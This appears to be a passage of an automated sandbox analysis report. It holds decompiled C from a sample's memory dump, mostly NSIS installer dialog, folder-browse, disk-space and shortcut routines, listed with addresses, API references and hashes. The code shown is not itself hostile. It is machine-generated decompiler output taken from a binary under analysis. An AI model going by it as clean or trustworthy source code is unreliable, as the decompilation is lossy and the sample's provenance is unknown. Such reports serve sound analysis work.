									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                        0x004046c5
                                        0x004046cb
                                        0x004046cd
                                        0x004046d3
                                        0x004046d9
                                        0x004046e6
                                        0x004046ef
                                        0x004046f2
                                        0x004046f5
                                        0x00404916
                                        0x0040491d
                                        0x00404931
                                        0x0040491f
                                        0x00404921
                                        0x00404924
                                        0x00404925
                                        0x0040492c
                                        0x0040492c
                                        0x0040493d
                                        0x0040494b
                                        0x0040494e
                                        0x00404964
                                        0x004049dc
                                        0x004049df
                                        0x004049e1
                                        0x004049eb
                                        0x004049f9
                                        0x004049f9
                                        0x004049fb
                                        0x00404a05
                                        0x00404a0b
                                        0x00404a2c
                                        0x00404a0d
                                        0x00404a1a
                                        0x00404a1a
                                        0x00404a0b
                                        0x00404a05
                                        0x00000000
                                        0x004049df
                                        0x00404969
                                        0x00404974
                                        0x00404979
                                        0x00404980
                                        0x00404987
                                        0x00404991
                                        0x00404991
                                        0x00404995
                                        0x0040499a
                                        0x0040499f
                                        0x004049b5
                                        0x004049a1
                                        0x004049a1
                                        0x004049a9
                                        0x004049b0
                                        0x004049ab
                                        0x004049ab
                                        0x004049ab
                                        0x004049a9
                                        0x004049b9
                                        0x004049bb
                                        0x004049c9
                                        0x004049ca
                                        0x004049d6
                                        0x004049d9
                                        0x004049d9
                                        0x0040499a
                                        0x00000000
                                        0x00404987
                                        0x0040496b
                                        0x00404972
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404a2f
                                        0x00404a2f
                                        0x00404a36
                                        0x00404aaa
                                        0x00404ab1
                                        0x00404abd
                                        0x00404abd
                                        0x00404ac6
                                        0x00404ac8
                                        0x00404acf
                                        0x00404ad2
                                        0x00404ad2
                                        0x00404ad8
                                        0x00404adf
                                        0x00404ae2
                                        0x00404ae2
                                        0x00404ae8
                                        0x00404aee
                                        0x00404af4
                                        0x00404af4
                                        0x00404b01
                                        0x00404c4e
                                        0x00404c55
                                        0x00404c72
                                        0x00404c78
                                        0x00404c8a
                                        0x00404c8a
                                        0x00000000
                                        0x00404b07
                                        0x00404b09
                                        0x00404b11
                                        0x00404b15
                                        0x00404b15
                                        0x00404b1d
                                        0x00404b5e
                                        0x00404b60
                                        0x00404b70
                                        0x00404b73
                                        0x00404b78
                                        0x00404b7f
                                        0x00404b82
                                        0x00404c24
                                        0x00404c2a
                                        0x00404c38
                                        0x00404c49
                                        0x00404c49
                                        0x00000000
                                        0x00404c38
                                        0x00404b88
                                        0x00404b8b
                                        0x00404b91
                                        0x00404b96
                                        0x00404b98
                                        0x00404b9a
                                        0x00404ba0
                                        0x00404ba7
                                        0x00404bac
                                        0x00404bb3
                                        0x00404bb6
                                        0x00404bb6
                                        0x00404bbd
                                        0x00404bc9
                                        0x00404bcd
                                        0x00404bcf
                                        0x00404bcf
                                        0x00404bbf
                                        0x00404bc1
                                        0x00404bc1
                                        0x00404bef
                                        0x00404bfb
                                        0x00404c0a
                                        0x00404c0a
                                        0x00404c0c
                                        0x00404c0f
                                        0x00404c18
                                        0x00000000
                                        0x00404b1f
                                        0x00404b2a
                                        0x00404b2d
                                        0x00404b32
                                        0x00404b34
                                        0x00404b38
                                        0x00404b48
                                        0x00404b52
                                        0x00404b54
                                        0x00404b57
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404b3a
                                        0x00404b3a
                                        0x00404b40
                                        0x00404b42
                                        0x00404b42
                                        0x00404b43
                                        0x00404b44
                                        0x00000000
                                        0x00404b3a
                                        0x00404b1d
                                        0x00404b01
                                        0x00404a3e
                                        0x00000000
                                        0x00404a54
                                        0x00404a5e
                                        0x00404a63
                                        0x00000000
                                        0x00000000
                                        0x00404a75
                                        0x00404a7a
                                        0x00404a86
                                        0x00404a86
                                        0x00404a88
                                        0x00404a97
                                        0x00404a99
                                        0x00404aa0
                                        0x00404aa3
                                        0x00000000
                                        0x00404aa3
                                        0x00404a3e
                                        0x004046fb
                                        0x00404700
                                        0x0040470a
                                        0x0040470b
                                        0x00404714
                                        0x0040471f
                                        0x0040473a
                                        0x0040474c
                                        0x00404751
                                        0x0040475c
                                        0x00404765
                                        0x0040477a
                                        0x0040478b
                                        0x00404798
                                        0x00404798
                                        0x0040479d
                                        0x004047a3
                                        0x004047a5
                                        0x004047a8
                                        0x004047ad
                                        0x004047b2
                                        0x004047b4
                                        0x004047b4
                                        0x004047b7
                                        0x004047b8
                                        0x004047d4
                                        0x004047d4
                                        0x004047d6
                                        0x004047d7
                                        0x004047dc
                                        0x004047df
                                        0x004047e2
                                        0x004047e6
                                        0x004047eb
                                        0x004047f0
                                        0x004047f4
                                        0x004047f9
                                        0x004047fe
                                        0x00404800
                                        0x00404808
                                        0x004048d2
                                        0x004048e5
                                        0x00000000
                                        0x0040480e
                                        0x00404811
                                        0x00404814
                                        0x00404817
                                        0x00404817
                                        0x0040481d
                                        0x00404823
                                        0x00404826
                                        0x0040482c
                                        0x0040482d
                                        0x00404832
                                        0x0040483b
                                        0x00404842
                                        0x00404845
                                        0x00404848
                                        0x0040484b
                                        0x00404887
                                        0x004048b0
                                        0x00404889
                                        0x00404896
                                        0x00404896
                                        0x0040484d
                                        0x00404850
                                        0x0040485f
                                        0x00404869
                                        0x00404871
                                        0x00404878
                                        0x00404880
                                        0x00404880
                                        0x0040484b
                                        0x004048b6
                                        0x004048b7
                                        0x004048c3
                                        0x004048c3
                                        0x004048d0
                                        0x004048eb
                                        0x004048ef
                                        0x0040490c
                                        0x00404911
                                        0x00404914
                                        0x00000000
                                        0x004048f1
                                        0x004048f6
                                        0x004048ff
                                        0x00404c8c
                                        0x00404c9e
                                        0x00404c9e
                                        0x004048ef
                                        0x00000000
                                        0x004048d0
                                        0x00404808

                                        APIs
                                        • GetDlgItem.USER32 ref: 004046BE
                                        • GetDlgItem.USER32 ref: 004046CB
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                        • LoadBitmapA.USER32 ref: 0040472A
                                        • SetWindowLongA.USER32 ref: 0040473D
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                        • DeleteObject.GDI32(?), ref: 0040479D
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                        • GetWindowLongA.USER32 ref: 004048D7
                                        • SetWindowLongA.USER32 ref: 004048E5
                                        • ShowWindow.USER32(?,00000005), ref: 004048F6
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                        • GlobalFree.KERNEL32 ref: 00404AE2
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                        • ShowWindow.USER32(?,00000000), ref: 00404C78
                                        • GetDlgItem.USER32 ref: 00404C83
                                        • ShowWindow.USER32(00000000), ref: 00404C8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                        • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                        • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                        • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































                                        0x004041eb
                                        0x004041f2
                                        0x004041fe
                                        0x0040420c
                                        0x00404214
                                        0x00404218
                                        0x0040421e
                                        0x0040421e
                                        0x0040422a
                                        0x004042a4
                                        0x004042ab
                                        0x00404377
                                        0x0040437e
                                        0x0040438d
                                        0x0040438d
                                        0x00404391
                                        0x00404397
                                        0x0040439a
                                        0x004043a7
                                        0x004043a9
                                        0x004043a9
                                        0x004043b7
                                        0x004043bd
                                        0x004043c4
                                        0x004043c6
                                        0x004043c6
                                        0x004043d3
                                        0x004043df
                                        0x00404403
                                        0x00404414
                                        0x0040441a
                                        0x0040441c
                                        0x00000000
                                        0x00000000
                                        0x00404422
                                        0x00404422
                                        0x00404430
                                        0x00000000
                                        0x004043e1
                                        0x004043e4
                                        0x004043e8
                                        0x004043ec
                                        0x004043ed
                                        0x004043f2
                                        0x00000000
                                        0x00000000
                                        0x004043fa
                                        0x00404432
                                        0x00404432
                                        0x00404439
                                        0x00404442
                                        0x00404444
                                        0x00404444
                                        0x00404456
                                        0x00404460
                                        0x00404468
                                        0x0040447e
                                        0x0040446a
                                        0x0040446e
                                        0x0040446e
                                        0x00404468
                                        0x00404483
                                        0x00404488
                                        0x0040448d
                                        0x00404496
                                        0x00404496
                                        0x0040449f
                                        0x004044a1
                                        0x004044a1
                                        0x004044ad
                                        0x004044b5
                                        0x004044bf
                                        0x004044bf
                                        0x004044c4
                                        0x00000000
                                        0x004044c4
                                        0x004043df
                                        0x00404380
                                        0x00404387
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404387
                                        0x004042b1
                                        0x004042b7
                                        0x004042d1
                                        0x004042d6
                                        0x004042e0
                                        0x004042e7
                                        0x004042ec
                                        0x004042f6
                                        0x004042f9
                                        0x004042fc
                                        0x00404303
                                        0x0040430b
                                        0x0040430e
                                        0x00404312
                                        0x00404319
                                        0x00404321
                                        0x00404370
                                        0x00404323
                                        0x00404324
                                        0x0040432a
                                        0x00404334
                                        0x0040433c
                                        0x0040433e
                                        0x0040433f
                                        0x00404341
                                        0x00404347
                                        0x00404355
                                        0x00404359
                                        0x00404359
                                        0x00404355
                                        0x0040435e
                                        0x00404369
                                        0x00404369
                                        0x00404321
                                        0x00000000
                                        0x004042d6
                                        0x004042c4
                                        0x00000000
                                        0x00000000
                                        0x004042ca
                                        0x00000000
                                        0x0040422c
                                        0x00404237
                                        0x00404240
                                        0x0040424d
                                        0x0040424d
                                        0x00404257
                                        0x0040425c
                                        0x00404265
                                        0x00404268
                                        0x0040426d
                                        0x00404275
                                        0x00404278
                                        0x0040427d
                                        0x00404283
                                        0x00404292
                                        0x00404299
                                        0x004044ca
                                        0x004044dc
                                        0x004044dc
                                        0x004042a2
                                        0x00000000
                                        0x004042a2

                                        APIs
                                        • GetDlgItem.USER32 ref: 00404230
                                        • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                        • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                        • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                        • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                        • SetDlgItemTextA.USER32 ref: 00404369
                                          • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                        • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                        • SetDlgItemTextA.USER32 ref: 0040447E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                        • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                        • API String ID: 2007447535-1909522251
                                        • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                        • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                        • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                        • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 74%
                                        			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                        0x004020af
                                        0x004020b9
                                        0x004020c2
                                        0x004020cc
                                        0x004020d5
                                        0x004020df
                                        0x004020e3
                                        0x004020e3
                                        0x004020e8
                                        0x004020f9
                                        0x00402101
                                        0x004021df
                                        0x004021df
                                        0x004021e6
                                        0x00402107
                                        0x00402107
                                        0x00402118
                                        0x0040211c
                                        0x00402122
                                        0x0040212c
                                        0x0040212e
                                        0x00402139
                                        0x0040213c
                                        0x00402149
                                        0x0040214b
                                        0x0040214d
                                        0x00402154
                                        0x00402157
                                        0x00402157
                                        0x0040215a
                                        0x00402164
                                        0x0040216c
                                        0x00402171
                                        0x0040217d
                                        0x0040217d
                                        0x00402180
                                        0x00402189
                                        0x0040218c
                                        0x00402195
                                        0x0040219a
                                        0x004021ac
                                        0x004021b5
                                        0x004021bb
                                        0x004021c7
                                        0x004021c7
                                        0x004021c9
                                        0x004021cf
                                        0x004021cf
                                        0x004021d2
                                        0x004021d8
                                        0x004021dd
                                        0x004021f2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004021dd
                                        0x004021e8
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 123533781-47812868
                                        • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                        • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                        • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                        • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 39%
                                        			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                        0x004026d4
                                        0x004026e8
                                        0x004026f3
                                        0x004026f4
                                        0x00402855
                                        0x004026d6
                                        0x004026d6
                                        0x004026d8
                                        0x004026da
                                        0x004026da
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
